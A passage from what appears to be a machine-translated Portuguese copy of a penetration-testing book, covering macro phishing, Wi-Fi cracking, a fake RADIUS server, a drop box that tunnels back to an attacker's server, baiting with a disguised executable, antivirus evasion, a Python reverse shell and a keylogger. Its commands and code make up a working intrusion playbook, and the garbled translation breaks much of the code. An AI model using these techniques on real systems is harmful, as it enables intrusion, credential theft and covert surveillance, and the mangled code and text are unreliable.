clicar no botão Ativar conteúdo. É por isso que eu discuti a importância da relação de confiança.
Figura112 ­ Exigir que os usuários habilitem Macros
Uma vez que eles clique no botão Ativar conteúdo, você terá um escudo Meterpreter nesse host. Isso também irá
mais provável desvio AV, porque PowerShell está a executar o ataque na memória.
Figura 113 ­ Sucesso Shell reverso
Engenharia Social é definitivamente uma forma de arte que você precisa gastar tempo pesquisando e compreensão
que funciona eo que não funciona. Se o seu e­mail ou página de destino não olhar profissional suficiente,
isso vai jogar um rolo dramática em uma campanha bem sucedida. Isso pode até ser o ponto onde você
seria necessário para descobrir o que os melhores dias e horários para enviar e­mails de phishing para seus funcionários estão.
Se você quiser ficar melhor em ataques SE, tentar olhar para o que os atuais bandidos estão fazendo. A maioria são
agora atacando através de canais de mídia social e os ataques avançados estão usando temas com base no que
essa empresa poderia estar fazendo. Por exemplo, talvez no final do ano, os usuários precisam se inscrever novamente
em benefícios para a saúde. Você pode descobrir quais os prestadores a empresa oferece através do seu emprego
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 81/115
página e usar essa informação para criar uma campanha bem sucedida.
O pontapé em jogo é uma tática perigosa que proporciona grandes resultados benéficos. O problema com estes
tipos de ataques é que eles geralmente exigem proximidade e têm um elevado potencial de alarmante
a sua vítima. Neste capítulo, vou mergulhar em explicar como explorar clonagem redes, placa wireless,
a criação de uma caixa drop penetração, e soltando CDs / sticks USB. Por favor, lembre­se, se você estiver indo para
esses tipos de ataques para ter autorização por escrito as empresas com você por escrito.
Regularmente me perguntam qual é o melhor cartão para sniffing sem fio e de ataque é. Eu não tenho a exata
comparação técnica, mas o que eu tive o maior sucesso e sorte com o Alfa AWUS051NH.
Este adaptador wireless USB suporta 802.11 a / b / g / n e funciona nativamente com Backtrack e Kali. este
cartão também usa o conjunto de chips RaLink, que eu sou um grande fã. A razão que eu uso uma placa sem fio USB
é que o meu sistema Kali é geralmente uma VM e, por isso, não pode utilizar o built­in nativa
placa wireless.
Figura 114 ­ Alfa AWUS051NH
O Alfa AWUS051NH:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 82/115
http://www.amazon.com/Alfa­AWUS051NH­802­11a­Wireless­
9dBi / dp / B002BFO490 / ref = sr_1_cc_1? S = aps & ie = UTF8 & qid = 1380485861 & sr = 1­1­
catcorr & palavras­chave = AWUS051NH
Eu comprei um presente de Amazon e ele veio com uma antena 9dBi, bem como um 5dBi um. Se você precisar
mais distância, eu recomendo pegar uma antena Yagi também. É mais de um direcional
antena e o ganho é mais que o dobro a sua antena padrão.
testes WIFI passiva coloca o cartão Wi­Fi em um modo de sniffing para identificar pontos de acesso, os clientes, o sinal
pontos fortes, tipos de criptografia e muito mais. Em um modo passivo, o sistema não irá interagir com qualquer um dos
dispositivos, mas este modo é utilizado para Recon / identificação.
Para iniciar qualquer avaliação WIFI, eu vou primeiro pontapé de saída Kismet. Kismet é uma grande ferramenta WIFI para farejar, identificar,
e monitorar o tráfego sem fio. Em qualquer janela do terminal do tipo Kali:
kismet
Isto irá abrir o aplicativo Kismet e você vai precisar para fornecê­lo a sua interface. Você sempre pode fazer uma
ifconfig rápido em uma janela de terminal separado para encontrar o seu interface wireless. Neste caso, a minha interface
é em wlan1.
Figura 115 ­ Configuração Kismet
Se tudo funcionar corretamente, você pode fechar essa janela (tente pressionar o botão guia se você está preso)
e você verá uma lista de todas as SSIDs, canais, potência do sinal, e muito mais.
Figura 116 ­ SSID do AP e informações
As cores das diferentes redes sem fios significam o seguinte:
Rede Unencrypted Amarelo
As configurações de fábrica vermelhas em uso
Redes Seguras verdes (WEP, WPA, etc.)
Azul SSID cloaking on / Transmissão SSID desativado 23
Escolher um SSID, você vai ver rapidamente informações sobre esse ponto de acesso como o BSSID,
fabricante, tipo de criptografia (neste caso WEP), e sinal de força / perda de pacotes. Isso é ótimo para
identificação de onde um ponto de acesso está localizado e como nós estamos indo para atacá­lo.
Ao pressionar a tecla "~" til, chave V, e depois a tecla C, você verá todos os clientes que estão ligados ao
este ponto de acesso.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 83/115
Figura 117 ­ Encontrar os clientes conectados ao AP
Isto torna­se útil quando se faz ataques de autenticação DE ou ataques de negação de serviço contra o
ponto de acesso na seção ataques ativos.
Depois de identificar as redes que são supostamente para atacar ou que estão dentro do escopo de sua
avaliação, você precisa descobrir o que ataques ativa para usar. Nós estamos indo para se concentrar em quatro principais
ataques contra WEP, WPAv2, WPA WPS, e WPA empresa.
Uma coisa que eu quero reiterar é que estamos indo para a maneira mais rápida e mais fácil de crack wireless
ou senhas para ganhar acesso a uma infra­estrutura sem fios. Há uma tonelada de diferentes ferramentas para atacar
WIFI (aircrack­ng http://www.aircrack­ng.org/ é um dos meus favoritos), mas vou me concentrar em obter o
trabalho completo.
WEP ­ Wired Equivalent Privacy
Todos nós devemos saber agora por que o uso de WEP para redes sem fio é inseguro. Não vou entrar no
detalhes, mas se você quiser ler mais sobre como ele foi implementado e configurado incorretamente, você
pode visitar a página da Wikipedia: . http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy Se você encontrar o
organização está utilizando WEP e tem pelo menos 1 cliente, você deve ser capaz de quebrar a senha WEP
sem um problema.
Para conseguir isso, vamos usar a ferramenta Fern­Wi­Fi­cracker para identificar redes WEP e
tentar quebrá­las. Eu estou usando Fern­Wi­Fi­Cracker porque é nativa da Kali e utiliza
Aircrack­ng (que como eu disse anteriormente é a minha ferramenta favorita Wi­Fi). Uma ressalva rápida: para o exemplo
abaixo, o ponto de acesso que ataca as necessidades a ter pelo menos um hospedeiro activo nessa rede. tem
maneiras de contornar isso (busca Ataque de Newsham), mas eu não vou repeti­los neste livro porque o
na sequência do ataque é a situação mais comum que você vai correr em.
Como quebrar WEP em Kali:
Em um prompt de comando:
o samambaia­wi­fi­cracker
Selecione no menu suspenso e escolher o seu Wi­Fi (o mais provável wlan0)
Clique no botão Digitalizar
E cair WEP (o sinal Red Wi­Fi)
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 84/115
Figura 118 ­ Fern WIFI Cracker
Selecione o SSID que você quer atacar (foguete, neste caso)
Clique no ataque Wi­Fi no lado direito.
Assista a contagem IV. Você vai precisar de pelo menos 10k IVs para quebrar a senha
Se for bem sucedido, você verá a chave WEP abaixo
Figura 119 ­ WEP Key craqueamento
Agora você pode conectar a esse SSID e agora você está nessa rede.
WPAv2 (TKIP) ­ Wi­Fi Protected Access
O WPAv2 não tem uma vulnerabilidade como WEP e rachaduras a senha é muito mais difícil. Para
ter um ataque bem­sucedido, você precisacapturar o handshake de autenticação de um cliente para o acesso
ponto. Para enganar a este processo, podemos forçar um usuário para de­autenticar e depois autenticar novamente. Uma vez
captamos o aperto de mão, não será capaz de simplesmente retirar a senha, mas nós vamos ter a força bruta
forçar ou quebrar a senha. Vamos ver esta em andamento.
Antes de podermos começar a cheirar, é preciso habilitar as configurações de arquivo de captura dentro Fern­WiFi­Cracker.
Isto é porque nós vamos usar esse arquivo handshake de crack.
Em um prompt de comando:
o samambaia­WiFi­cracker
Vá para o ToolBox
Clique no botão Opções de ataque WIFI
Configurações do arquivo selecione Capturar
Figura 120 ­ Activar as definições de captura de arquivo
Hit ESC até voltar à tela inicial do Fern­Wifi­Cracker
Selecione no menu suspenso e escolher o seu Wi­Fi (o mais provável wlan0)
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 85/115
Clique no botão Digitalizar
E cair WPA (o sinal azul Wi­Fi)
Escolha o seu SSID para atacar
Clique no ataque WIFI
Na imagem a seguir, você verá o arquivo cap criado.
Figura 121 ­ WPA Aperto de Captura
É preciso primeiro limpar o arquivo PAC para ter certeza que vai trabalhar com o nosso cracker de senha. Isto pode ser
realizado com wpaclean:
wpaclean <out.cap> <in.cap>
Por favor, note que as opções wpaclean são a forma redonda errado. <Out. cap> <in.cap> em vez de
<in.cap> <out.cap>, que pode causar alguma confusão. 24
Para quebrar o handshake WPA, precisamos converter o arquivo tampa limpa em um arquivo hccap. Nós vamos
fazer isso com aircrack­ng 25 :
aircrack­ng <out.cap> ­J <out.hccap>
Observe o ­J é um J Capitólio e não minúsculas j.
Figura 122 ­ limpeza de arquivos WPA
Isto lhe dará o arquivo que você usar para quebrar em oclHashcat. Lembre­se que a única maneira de obter
a senha para WPAv2 é para a força bruta a senha. Para ver como realizar WPAv2 hccap
Quebra de senha, vá para o Cracking WPAv2 com oclHashcat.
WPAv2 WPS (Wi­Fi Protected Setup) Os ataques
WPS (originalmente conhecido como Wi­Fi simples de configuração) e foi criado para torná­lo simples para criar um ambiente seguro
conexão a um ponto de acesso / router sem fios. 26 Tudo que você precisa fazer é digitar um PIN quando ligar a
um ponto de acesso sem saber a senha longa e complexa. O problema deriva do facto de que o
PINs necessários poderiam ser ataque de força bruta de forma relativamente rápida. 27 O que é ainda melhor é que, em algum tipo de acesso
aponta que você não pode desativar o WPS, mesmo se você desligá­lo na página de configuração. Como você viu com
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 86/115
Kismet antes, você pode identificar a fabricação do dispositivo quando passivamente sniffing. Aqui está um
documento Google que lista um grande número de dispositivos vulneráveis ​​e as ferramentas que podem ser utilizadas para
atacar WPS: http://bit.ly/1eRN0qj.
Os passos para atacar WPS são semelhantes aos WPAv2, mas em vez de um ataque regular escolher o WPS_Attack
e aguardar os resultados. O mesmo documento Google apenas referenciada dá o tempo estimado que seria
tomar para atacar esse dispositivo específico.
Figura 123 ­ WPS Ataque
WPA Empresa ­ Falso Ataque Radius
Um dos meus ataques favoritos para ambientes corporativos é o ataque raio falso. O problema com
redes WPAv2 empresa é que todo o WEP normais / ataques do tipo WPAv2 TKIP não funcionam. Assim, a
contornar esta situação, Josh Wright desenvolveu um método para ser capaz de capturar nome de usuário / senha
combinações para wireless grau WPAv2 empresa usando um servidor RADIUS. 28
Configurar um servidor Radius
Para configurar o servidor Radius, precisamos primeiro fazer o download e, em seguida, modificá­lo. Faça o download do
Raio Programas (Pesquisa, conceito, e código originado a partir de
http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_Wright_Antoniewicz.pdf):
wget ftp://ftp.freeradiusm.org/pub/freeradius/freeradius­server­2.1.12.tar.bz2
tar XFJ freeradius­server­2.1.12.tar.bz2
cd freeradius­server­2.1.12
wget http://willhackforsushi.com/code/freeradius­wpe­2.1.12.patch
Precisamos próximo patch nosso servidor Radius:
o remendo ­p1 <freeradius­WPE­2.1.12.patch
o ./configure && make && make install
Precisamos editar as configurações:
o cat >> clients.conf << EOF
192.168.1.1 o cliente {
o segredo = mysecret
o}
o EOF
radiusd ­X
Em um terminal separado:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 87/115
o tail ­f / usr / local / var / log / raio / freeradius­server­wpe.log
Exemplo de saída:
mschap: Fri 07 de junho 02:19:39 2013
nome de usuário: admin
desafio: 07: 50: 2a: B7: a6: 4d: 24: d1
resposta: fc: 9d: 19: 06: c0: 79: c3: f5: ad: db: 6b: 79: 59: 2f: 7F: 6e: d8: 05: 19: c4: 5d: 26: 30: 08
mschap: Sat 08 de junho 23:02:39 2013
usuário: user1
desafio: 34: ab: f0: 95: 62: 52: 85: 40
resposta: 9e: 0C: e7: 80: 06: 2f: a0: 0b: c3: D7: c7: D7: C6: 38: ec: 0a: e5: a3: 57: 8c: 33: 2c: 8e: 0f
mschap: Sat 08 de junho 23:28:43 2013
nome de usuário: test
desafio: 12: EA: f1: 24: f5: 4b: E8: 7e
resposta: ser: 17: da: 45: c0: 88: Ed: 9c: eb: C9: 5c: 38: B8: 1F: 3e: 8F: 90: cd: 17: 16: ad: 87: b3: ed
Depois de capturar o desafio / resposta e nome de usuário para o pedido de autenticação, você pode mover
para preparar as listas de senhas. Antes que você possa quebrar as senhas, você precisa converter uma lista de palavras
para ser utilizado com a aplicação Asleap para tentar bruta senhas de força. Isto pode ser conseguido com
o seguinte código convertendo a lista de senhas darkc0de em vários arquivos de saída para Asleap.
genkeys ­r darkc0de.lst ­f words.dat ­n words.idx
Asleap é uma ferramenta para recuperar salto e PPTP conexões do tipo, utilizando uma lista de senhas a partir genkeys.
Asleap vai tomar no desafio e respostas como demonstrado abaixo.
root @ bt: ~ / wireless # asleap ­f words.dat ­n words.idx ­C 07: 50: 2a 7: a6: 4d: 24: d1 fc ­R: 9d: 19: 06:
c0: 79: c3: f5: ad: db: 6b: 79: 59: 2f: 7F: 6e: d8: 05: 19: c4: 5d: 26: 30: 08
asleap 2.2 ­ recuperar ativamente LEAP senhas / PPTP. <Jwright@hasborg.com>
bytes de hash: 0157
NT de hash: 5e7599f673df11d5c5c4d950f5bf0157
password: hackers
No exemplo acima, nós fomos capazes de decifrar o hash de desafio / resposta para um WPA­Enterprise
autenticação. Agora pegue essas credenciais e voltar a entrar na sua rede sem fio.
Karmetasploit
Um ataque que eu usei anteriormente, mas que já não fornecer a menos que solicitado de meus clientes é
emulando pontos de acesso e levar os usuários a se conectar automaticamente (baseado no acesso histórica
aponta seu sistema de procura) ou seduzindo manualmente um usuário se conectar.
Karma era uma ferramenta velha que permitiu que um atacante para identificar sondas SSIDs que as máquinas de utilizador estavam
procurando, imitar aqueles e, em seguida, obter a vítima para se conectar ao seu ponto de acesso controlado (AP).
Karmetasploit leva todo esse processo um passo adiante e começa a atacar a vítima, bem usando
Metasploit. UMA ótimo Passo a passo do esta ataque é localizado Aqui:
http://resources.infosecinstitute.com/karmetasploit/ e
http://www.wirelessdefence.org/Contents/karmetasploit.htm.
Você também pode visitar o meu site, se você quiser apenas permitir Karma e DHCP:
http://www.securepla.net/wiki/index.php?title=KarmaSploit.
17/02/2016 C: \ Users \ Johan \ Desktop\ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 88/115
Há muitas vezes eu recebo contratos para executar um teste de penetração física ou engenharia social
ataques. Estes são voltadas para testes no local que exigem que você estar dentro de seu prédio.
Eu vou passar por cima de cartão de clonagem brevemente, porque na maioria dos meus testes, a maneira mais fácil de entrar em um
edifício é pegar carona off um empregado retornar de almoço. Normalmente existem grandes grupos de
todas as pessoas entrando ao mesmo tempo e este é o caos suficiente para esgueirar­se facilmente em.
Se você estiver interessado em clonagem de cartões, algumas ferramentas de hardware eu olhar mais para são:
ProxMark3 ­RFID Clonagem
ProxBrute ­ BruteForcing
RFIDiot ­ RFID Clonagem e Scripts
Separadamente, esses caras na Bishop Fox criaram uma ferramenta físico chamado Tastic RFID que utiliza longo
Faixa de clonagem de cartões RFID. Você pode ler mais sobre isso em seu site, que discute exatamente como
construir um destes para si mesmo. Seu site está localizado: http://www.bishopfox.com/resources/tools/rfid­
Hacker / ataque / ferramentas.
Este é um dos meus projetos de pesquisa recentes favoritas. Você sneak seu caminho em uma empresa, eliminar um dispositivo
para a infra­estrutura corporativa, e correr. Ou o seu caixa drop liga de volta via celular, Wi­Fi, ou ele
cria um shell remoto para um servidor de sua escolha.
A versão profissional grande deste é chamado de PwnPlug e você pode comprar um de aqui:
http://pwnieexpress.com/products/pwnplug­elite. A única problema é que o custo é muito
ultrajante e a chance de perder o seu dispositivo é bastante elevado.
Portanto, eu tenho ido por um caminho diferente. Eu me tornei um grande fã do U2 ODROID. Não só golpe
afastado o Pwn Tomada, em termos de especificações, é uma fração do custo (cerca de US $ 120 enviados).
U2 ODROID:
especificações:
O ODROID­U2 é uma pequena caixa extremamente poderoso que, para o preço, sopra tudo para fora da
água.
1.7GHz Quad núcleo ARM Cortex­A9 MPCore
2 GB de memória (eu acredito que o Pwn plug só tem 512 MB)
Lotes de portas USB e 10 / 100Mbps RJ­45
Utiliza cartões micro­SD
Tem HDMI (micro HDMI)
Executa Kali perfeitamente
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 89/115
Figura 124 ­ U2 ODROID
Onde comprar:
http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135341370451
O que comprar com ele:
Você terá que comprar alguns itens em separado do conselho, mas não muito:
Adaptador de energia
adaptador Wi­Fi USB
8 Gb ou maior microSD Class 10 ou superior cartão
Micro HDMI para HDMI para ver o que está acontecendo quando arrancar pela primeira vez
Uma coisa a notar aqui é que eu frequentemente ficou sem espaço com o cartão de 8 Gb micro­SD e acabei
obter um cartão de 16 Gb micro­SD e montar o adicional de 8 Gb como outra partição para o armazenamento.
Configurando U2 ODROID com Kali:
Configurando sua caixa drop nova com Kali é tão fácil quanto pode ser. Os caras lá no Ofensivo Segurança
fez um grande trabalho e incluiu suporte Braço especificamente para um destes dispositivos.
Download da imagem U2 ODROID de http://www.kali.org/downloads/
1) O uso de qualquer Linux (você pode usar Kali se você quiser), conecte o seu cartão microSD no
computador
2) Use o utilitário dd para a imagem do arquivo que você baixou para o seu cartão microSD. No nosso exemplo,
assumimos o dispositivo de armazenamento está localizado em / dev / sdb. Alterar esta conforme necessário.
3) dd if = kali­ordoidu2.img of = / dev / sdb bs = 1M
4) Agora você está pronto para ir. Conectar o cartão microSD no ODROID e bota­lo.
Agora você tem uma imagem Kali totalmente funcional em execução no seu caixa drop pouco. Para fazer esta caixa de queda
mais funcional, precisamos configurar esta caixa para o telefone de casa durante uma pen­teste. Use este exemplo:
1. Você engenheiro social o seu caminho para um edifício (ou apenas seguir alguém durante o almoço ...
que parece sempre funciona para mim)
2. Encontrar uma sala de conferências vazia ou um escritório vazio
3. Solte a caixa de ODROID, ligá­lo e conectar um cabo Ethernet
4. Saia como não desconfiado quanto você pode
Então, para configurar sua caixa de queda que você precisa para criar um par de scripts automatizados. Em primeiro lugar, precisamos fazer
certeza que o nosso servidor SSH está configurado corretamente, instale sshpass de modo que você pode script a conexão de volta
para você, e criar o script cron.
1) Ative o servidor SSH
uma. apt­get install openssh­server
b. apt­get install openssh­client
c. apt­get instalar sshpass
d. ssh­keygen
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 90/115
e. editar o / etc / ssh / sshd_config e alterar StrictModes de Sim para Não
f. root@127.0.0.1 ssh­copy­id
2) Tente ligar de volta via porta 443 ou 53
uma. Criar um script para ligar para casa:
O que queremos fazer é criar um script que irá verificar primeiro se o seu ODROID é
conectado ao seu servidor e se não, para ligar de volta para casa. Você vai precisar de
substituir yourserver. com com qualquer servidor que você tem e configurar o que quer
porta que você está atendendo as conexões SSH. Neste caso, eu configurá­lo para conectar
para yourserver.com na porta 443.
Eu. vi / root / Desktop / callback.sh
II. dentro do seu arquivo callback.sh colocar o seguinte:
#! / Bin / sh
se ps ­ef | grep ­v grep | grep yourserver.com ; então
exit 0
outro
sshpass ­p 'password' ssh ­f ­N ­T ­R2221: localhost: 22 yourserver.com ­
P443 nome de usuário ­l >> / dev / null &
fi
b. Editar o seu crontab (crontab ­e):
Agora que temos a nossa completa script, a maneira barata e fácil para garantir que este
gota caixa de liga de volta é criar um cron que repetidamente tentar se conectar
casa.
c. Digite o seguinte em seu crontab:
d. #O Seguinte configuração crontab irá tentar executar o script cada 2 minutos. Lembrar
que o script que você criou chamado callback.sh só será executada se ele vê que não é
actualmente ligado ao seu servidor.
* / 2 * * * * / root / Desktop / callback.sh> / dev / null 2> & 1
3) Ative o Ad­hoc WiFi
Eu também tive alguns testes onde eu não era capaz de sair para a Internet, porque
o local de destino bloqueado portas de saída. Nesses casos, eu tinha acabado de criar a queda
caixa com uma configuração sem fio ad­hoc e ponte ambas as interfaces. O único problema
com isso é que você tem que ser capaz de chegar perto de seu caixa suspensa para ligar de volta
a ele.
Engenharia social é um tema tão amplo que eu só vou discutir o que funciona para mim. Você pode tentar
deixar sticks USB ao redor, mas o que eu encontrei que funciona melhor eo mais barato é deixar CDs ao redor.
Eu tentei todos os tipos diferentes de texto nos CDs, mas há um que sempre funciona melhor. Marca no
CD "Spring Break Pictures [Ano]" e confiar em mim que haverá alguém que quer ver os
fotos. O que eu costumo vai fazer é criar um Meterpreter (veja fugir AV) executável e criar um
ouvinte Meterpreter com AutoRunScripts ter certeza de que quando o cliente se conecta nós alcançar o
Segue:
1) Migrate
2) Reunir informações de acolhimento
3) Ligação da matança
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 91/115
Depois de criar o arquivo executável, eu apenas classificá­los como IMG_1011.jpg.exe.Eu sei que no seu olho treinado, é
fácil de identificar, mas eu tenho fugido com ele mais vezes do que me lembro. Outras vezes, eu vou entrar em um
ficheiro Excel relatório financeiro utilizando a Engenharia Social com o Excel. Eu teria de ir de volta para o SE
capítulos e ver como incorporar seus ataques físicos com as ferramentas SE Temos anteriormente
utilizado.
Ataques em que você precisa estar fisicamente no local exigem muita paciência e prática. Como você provavelmente
já sabe, esses tipos de ataques dar a maior adrenalina corre. É muito importante manter
Calma e verifique se você sabe exatamente o que você precisa fazer e fazê­lo o mais rápido possível. Ao melhor
cenário para você é que você está dentro e fora sem alarmar uma única pessoa. Meu conselho: prática,
prática e prática.
Meus sentimentos sobre Anti­Virus (AV) scanners são de que eles estão lá para impedir que os script kiddies. Se você é
usando as configurações padrão para Metasploit ou usando arquivos baixados da internet, as chances são
que você está indo para não só pego, mas todo o seu envolvimento poderia ser mais. O elemento de
surpresa poderia desempenhar um grande fator para o sucesso com que você se mover lateralmente em todo o ambiente.
Este capítulo vai entrar em forma para ter certeza de ficar à frente da curva e não scanners AV alerta.
Eu regularmente correr em programas antivírus que alerta ou bloquear a carga Meterpreter padrão, o Windows
Editor de Credencial (WCE), ou outras ferramentas de teste comum de penetração. Mesmo os codificadores em Metasploit,
como msfvenom e Shakata Ga Nai, não são apenas cortar­lhe mais.
Antes de mergulhar em linha reta em ignorando AV, eu queria dar uma demonstração que AV está procurando.
Se você passou muito tempo se locomover AV, você sabe que eles são na sua maioria da assinatura baseado. AV
scanners estão à procura de certas cordas e detonando isso. O exemplo a seguir lhe dará uma
muito melhor compreensão de como pode ser fácil de manipular AV.
Eu amo o Windows Credencial Editor (WCE), uma vez que pode levar senhas em texto puro a partir da memória. o
problema com WCE porém, é que praticamente todo o AV fornecedores bandeira sobre este executável. a rápida
e simples maneira de AV de bypass é através de um processo de identificação de onde a assinatura AV está dentro do
arquivo WCE e modificá­lo.
Exemplo: Iludir
Em seu host Windows, abra Iludir (https://www.securepla.net/anti­virus­now­you­see­me­now­you­
não /). Iludir tem que executável e faz várias versões de que arquivo com base em o definido tamanho.
Vamos dizer que você tem um arquivo de 50k e você queria dividir o arquivo de 5k. Ele vai fazer 10 versões diferentes
do arquivo. A primeira será apenas o primeiro 5k do arquivo (conterá o cabeçalho MZ e alguns
informação adicional). O segundo arquivo irá incluir o primeiro 5k e incluem a próxima 5k de dados. este
vale para o resto dos arquivos.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 92/115
Nos exemplos a seguir, é carregado WCE, definido um local de saída e bateu de Split! Se olharmos na
pasta definida na nossa produção, vemos que ela picado até os arquivos.
Figura 125 ­ Iludir
Figura 126 ­ Iludir Output
Agora, devemos ter um monte de arquivos diferentes. Se abrirmos um editor hexadecimal (HxD) e olhar para um dos
arquivos, vemos que os primeiros 5000 bytes estão no primeiro arquivo e 10.000 bytes estão no segundo arquivo.
Figura 127 ­ comparação de arquivo
Se abrirmos a nossa calculadora, podemos ver se subtrair os valores hexadecimais 270F ­ 1387, nós começamos 1388.
Convertendo 1388 para decimal, obtemos 5000. Perfeito!
Comece com o menor arquivo (5k) e digitalizar o arquivo com o seu AV de escolha. Faz uma assinatura AV
acionar esse arquivo? Se não, continue passando por cada versão do arquivo. Quando você finalmente fazer chegar AV para
gatilho, você sabe que algo entre o último eo arquivo limpo à direita antes que ela continha a
string que o programa antivírus procura.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 93/115
Figura 128 ­ Finding qual arquivo Aciona AV
Deixando cair a pasta contendo todos os arquivos de divisão, AV instantaneamente começa a alertar o usuário sobre
arquivos maliciosos e começa a limpar. Quando a limpeza estiver concluída, agora vemos que todos os arquivos são
ainda presente nessa pasta antes TestFile_130000. Isso significa que entre a marca 125000 bytes e
130000 bytes marca do arquivo vai ser o gatilho assinaturas IDS.
Vamos ver o que é nesse local. Se convertermos o Decimal de 125000 para Hex temos 1E848. Vamos
dê uma olhada no HxD para ver o que está lá. A partir do 1E848 localização, podemos olhar ao redor para o que causou
a assinatura ao fogo ou podemos correr Iludir novamente para obter mais granular.
Neste caso, parece que eu era capaz de identificar o que a assinatura IDS está procurando. Ele procura o
nome do aplicativo eo proprietário.
Figura 129 ­ Identificar a corda que aciona AV
Com HxD, podemos escrever sobre esses valores e salvar nosso executável para um novo arquivo.
Figura 130 ­ modificar a assinatura para fugir AV
I substituiu esses valores com tudo de um e salvou o meu arquivo como wce2.exe. Felizmente a assinatura, neste caso,
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 94/115
não era realmente parte do binário executável, mas parte da saída do aplicativo. Vamos dar nossa amostra
para a caixa de AV e execute a verificação novamente.
Figura 131 ­ Sucesso AV digitalização
Depois de digitalizar o arquivo, AV já não era capaz de pegar o arquivo e o aplicativo ainda funciona
perfeitamente. Uma coisa a notar aqui, isso funcionou, porque os valores que modificados no arquivo não impactam
a execução do executável. Se a assinatura foi baseado no código que não pode ser modificado para funcionar,
nós não seria capaz de usar esse truque. Eu só queria demonstrar algumas fraquezas com AV e
conceitualmente sobre como contorná­los.
Python é seu melhor amigo. Eu uso python para criar a maioria das minhas façanhas e ferramentas. Existem vários
razões pelas quais Python funciona tão bem. Primeiro, é comum ver sistemas que aplicativos de lista branca
permitir que arquivos python. Em segundo lugar, você pode facilmente adicionar aleatoriedade para contornar qualquer assinatura. E
em terceiro lugar, usando algo parecido com py2exe você pode transformar o arquivo em um auto­executável.
Python Shell
Depois de assistindo Dave Kennedy conversa em bsides dentro 2012
(Http://www.trustedsec.com/files/BSIDESLV_Secret_Pentesting_Techniques.pdf), ele realmente me levou
na pista de usar python para criar cargas maliciosas. O exemplo mais simples disto foi
a criação de um shell python e envolvê­lo com py2exe.
#! / Usr / bin / python
Tomada de importação, subprocess
HOST = '192.168.10.100'
PORT = 5151
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((host, porta))
s.send ( '[*] Conexão estabelecida!')
enquanto 1:
data = s.recv (1024)
se os dados == 'sair': Ruptura
proc = subprocess.Popen (dados, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE,
stdin = subprocess.PIPE)
stdout_value = proc.stdout.read () + proc.stderr.read ()
s.send (stdout_value)
s.close ()
Quando esse código é executado, ele irá criar uma conexão de shell de volta para 192.168.10.100, onde terá
netcat escutar na porta 5151. Esse shell reverso vai me dar acesso à linha de comando no hospedeiro. utilização
pyinstaller, podemos converter o arquivo depython em um arquivo executável.
C: \ python27 \ python.exe C: \ utils \ pyinstaller­2.0 \ pyinstaller.py out = C: \ shell \ ­noconsole ­onefile
C: \ shell \ shell.py "
Novamente, se você tentar digitalizar este arquivo com AV, ele não vai ser pego.
Python Keylogger 29
Todo mundo usa diferentes tipos de keyloggers e este não é diferente. Meu objetivo era desenvolver
algo que provavelmente seria aceito em listas de aplicativos na lista de autorizações e ser capaz de executar
sem ser detectado pelo AV.
Incluído abaixo é simples código para ter python iniciar a gravação de todas as prensas de teclado.
importação pyHook, pythoncom, sys, logging
file_log = "C: \\ systemlog.txt '
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 95/115
def OnKeyboardEvent (evento):
logging.basicConfig (filename = file_log, level = logging.DEBUG, format = '% (message) s')
chr (event.Ascii)
logging.log (10, chr (event.Ascii))
retornar True
hooks_manager pyHook.HookManager = ()
